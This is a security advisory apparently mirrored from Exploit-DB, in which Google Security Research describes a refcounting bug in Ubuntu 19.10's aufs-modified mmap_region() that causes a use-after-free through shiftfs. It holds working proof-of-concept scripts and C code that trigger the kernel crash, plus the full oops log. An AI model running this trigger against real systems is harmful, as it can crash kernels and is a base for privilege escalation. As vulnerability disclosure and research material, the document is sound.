Ubuntu 19.10 – ubuntu-aufs-modified mmap_region() Breaks Refcounting in overlayfs/shiftfs Error Path

  • 作者: Google Security Research
    日期: 2019-11-20
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/47692/
  • Tested on 19.10.
    
    Ubuntu's aufs kernel patch includes the following change (which I interestingly
    can't see in the AUFS code at
    https://github.com/sfjro/aufs5-linux/blob/master/mm/mmap.c):
    
    ==================================================================
    +#define vma_fput(vma)vma_do_fput(vma, __func__, __LINE__)
    [...]
    @@ -1847,8 +1847,8 @@ unsigned long mmap_region(struct file *file, unsigned long addr,
    return addr;
     
     unmap_and_free_vma:
    + vma_fput(vma);
    vma->vm_file = NULL;
    - fput(file);
     
    /* Undo any partial mapping done by a device driver. */
    unmap_region(mm, vma, prev, vma->vm_start, vma->vm_end);
    [...]
    +void vma_do_fput(struct vm_area_struct *vma, const char func[], int line)
    +{
    + struct file *f = vma->vm_file, *pr = vma->vm_prfile;
    +
    + prfile_trace(f, pr, func, line, __func__);
    + fput(f);
    + if (f && pr)
    + fput(pr);
    +}
    ==================================================================
    
    This means that in the case where call_mmap() returns an error to mmap_region(),
    fput() will be called on the current value of vma->vm_file instead of the saved
    file pointer. This matters if the ->mmap() handler replaces ->vm_file before
    returning an error code.
    
    overlayfs and shiftfs do that when call_mmap() on the lower filesystem fails,
    see ovl_mmap() and shiftfs_mmap().
    
    To demonstrate the issue, the PoC below mounts a shiftfs that is backed by a
    FUSE filesystem with the FUSE flag FOPEN_DIRECT_IO, which causes fuse_file_mmap()
    to bail out with -ENODEV if MAP_SHARED is set.
    
    I would have used overlayfs instead, but there is an unrelated bug that makes it
    impossible to mount overlayfs inside a user namespace:
    Commit 82c0860106f264 ("UBUNTU: SAUCE: overlayfs: Propogate nosuid from lower
    and upper mounts") defines SB_I_NOSUID as 0x00000010, but SB_I_USERNS_VISIBLE
    already has the same value. This causes mount_too_revealing() to bail out with a
    WARN_ONCE().
    
    Note that this PoC requires the "bindfs" package and should be executed with
    "slub_debug" in the kernel commandline to get a clear crash.
    
    ==================================================================
    Ubuntu 19.10 user-Standard-PC-Q35-ICH9-2009 ttyS0
    
    user-Standard-PC-Q35-ICH9-2009 login: user
    Password: 
    Last login: Fr Nov1 23:45:36 CET 2019 on ttyS0
    Welcome to Ubuntu 19.10 (GNU/Linux 5.3.0-19-generic x86_64)
    
     * Documentation:https://help.ubuntu.com
     * Management: https://landscape.canonical.com
     * Support:https://ubuntu.com/advantage
    
    
    0 updates can be installed immediately.
    0 of these updates are security updates.
    
    user@user-Standard-PC-Q35-ICH9-2009:~$ ls
    aufs-mmapDocumentsMusic Public trace.dat
    DesktopDownloadsPicturesTemplatesVideos
    user@user-Standard-PC-Q35-ICH9-2009:~$ cd aufs-mmap/
    user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat /proc/cmdline 
    BOOT_IMAGE=/boot/vmlinuz-5.3.0-19-generic root=UUID=f7d8d4fb-0c96-498e-b875-0b777127a332 ro console=ttyS0 slub_debug quiet splash vt.handoff=7
    user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run.sh
    #!/bin/sh
    sync
    unshare -mUr ./run2.sh
    user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat run2.sh
    #!/bin/bash
    set -e
    
    mount -t tmpfs none /tmp
    mkdir -p /tmp/{lower,middle,upper}
    touch /tmp/lower/foo
    # mount some random FUSE filesystem with direct_io,
    # doesn't really matter what it does as long as
    # there's a file in it.
    # (this is just to get some filesystem that can
    # easily be convinced to throw errors from f_op->mmap)
    bindfs -o direct_io /tmp/lower /tmp/middle
    # use the FUSE filesystem to back shiftfs.
    # overlayfs would also work if SB_I_NOSUID and
    # SB_I_USERNS_VISIBLE weren't defined to the same
    # value...
    mount -t shiftfs -o mark /tmp/middle /tmp/upper
    mount|grep shift
    gcc -o trigger trigger.c -Wall
    ./trigger
    user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ cat trigger.c
    #include <fcntl.h>
    #include <err.h>
    #include <unistd.h>
    #include <sys/mman.h>
    #include <stdio.h>
    
    int main(void) {
    int foofd = open("/tmp/upper/foo", O_RDONLY);
    if (foofd == -1) err(1, "open foofd");
    void *badmap = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
    if (badmap == MAP_FAILED) {
    perror("badmap");
    } else {
    errx(1, "badmap worked???");
    }
    sleep(1);
    mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
    }
    user@user-Standard-PC-Q35-ICH9-2009:~/aufs-mmap$ ./run.sh 
    /tmp/middle on /tmp/upper type shiftfs (rw,relatime,mark)
    badmap: No such device
    [ 72.101721] general protection fault: 0000 [#1] SMP PTI
    [ 72.111917] CPU: 1 PID: 1376 Comm: trigger Not tainted 5.3.0-19-generic #20-Ubuntu
    [ 72.124846] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
    [ 72.140965] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
    [ 72.149210] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
    [ 72.167229] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
    [ 72.170426] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX: 7800000000000000
    [ 72.174528] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI: ffff9c1cc48b5900
    [ 72.177790] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09: 0000000000000000
    [ 72.181199] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12: ffff9c1cf1ae5790
    [ 72.186306] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15: ffff9c1cf7209740
    [ 72.189705] FS:00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000) knlGS:0000000000000000
    [ 72.193073] CS:0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    [ 72.195390] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4: 0000000000360ee0
    [ 72.198237] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
    [ 72.200557] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
    [ 72.202815] Call Trace:
    [ 72.203712]mmap_region+0x417/0x670
    [ 72.204868]do_mmap+0x3a8/0x580
    [ 72.205939]vm_mmap_pgoff+0xcb/0x120
    [ 72.207954]ksys_mmap_pgoff+0x1ca/0x2a0
    [ 72.210078]__x64_sys_mmap+0x33/0x40
    [ 72.211327]do_syscall_64+0x5a/0x130
    [ 72.212538]entry_SYSCALL_64_after_hwframe+0x44/0xa9
    [ 72.214177] RIP: 0033:0x7faa3ecc7af6
    [ 72.215352] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
    [ 72.222275] RSP: 002b:00007ffd0fc44c68 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
    [ 72.224714] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007faa3ecc7af6
    [ 72.228123] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
    [ 72.230913] RBP: 0000000000000000 R08: 0000000000000003 R09: 0000000000000000
    [ 72.233193] R10: 0000000000000001 R11: 0000000000000246 R12: 0000556248213100
    [ 72.235448] R13: 00007ffd0fc44d70 R14: 0000000000000000 R15: 0000000000000000
    [ 72.237681] Modules linked in: shiftfs intel_rapl_msr snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core snd_hwdep snd_pcm snd_seq_midi snd_seq_midi_event snd_rawmidi intel_rapl_common crct10dif_pclmul crc32_pclmul ghash_clmulni_intel aesni_intel aes_x86_64 crypto_simd snd_seq cryptd glue_helper joydev input_leds serio_raw snd_seq_device snd_timer snd qxl ttm soundcore qemu_fw_cfg drm_kms_helper drm fb_sys_fops syscopyarea sysfillrect sysimgblt mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover failover ahci psmouse lpc_ich i2c_i801 libahci virtio_blk
    [ 72.257673] ---[ end trace 5d85e7b7b0bae5f5 ]---
    [ 72.259237] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
    [ 72.260990] Code: 8b e0 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
    [ 72.269615] RSP: 0018:ffffc1490061bd40 EFLAGS: 00010202
    [ 72.271414] RAX: 6b6b6b6b6b6b6b6b RBX: ffff9c1cf1ae5788 RCX: 7800000000000000
    [ 72.273893] RDX: 8000000000000025 RSI: ffff9c1cf14bfdc8 RDI: ffff9c1cc48b5900
    [ 72.276354] RBP: ffffc1490061bd60 R08: ffff9c1cf14bfdc8 R09: 0000000000000000
    [ 72.278796] R10: ffff9c1cf1ae5768 R11: 00007faa3eddb000 R12: ffff9c1cf1ae5790
    [ 72.281095] R13: ffff9c1cc48b7740 R14: ffff9c1cf14bfdc8 R15: ffff9c1cf7209740
    [ 72.284048] FS:00007faa3ed9e540(0000) GS:ffff9c1cfbb00000(0000) knlGS:0000000000000000
    [ 72.287161] CS:0010 DS: 0000 ES: 0000 CR0: 0000000080050033
    [ 72.289164] CR2: 0000558ad728d3e0 CR3: 0000000144804003 CR4: 0000000000360ee0
    [ 72.291953] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
    [ 72.294487] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
    ==================================================================
    
    Faulting code:
    
    0000000F55push rbp
    000000104889E5mov rbp,rsp
    000000134157push r15
    000000154156push r14
    000000174155push r13
    000000194154push r12
    0000001B488B87C8000000mov rax,[rdi+0xc8]
    000000224C8B6810mov r13,[rax+0x10]
    00000026498B4528mov rax,[r13+0x28]
    0000002A4883786000cmp qword [rax+0x60],byte +0x0 <<<< GPF HERE
    0000002F0F8497000000jz near 0xcc
    000000354989FCmov r12,rdi
    000000384989F6mov r14,rsi
    
    As you can see, the poison value 6b6b6b6b6b6b6b6b is being dereferenced.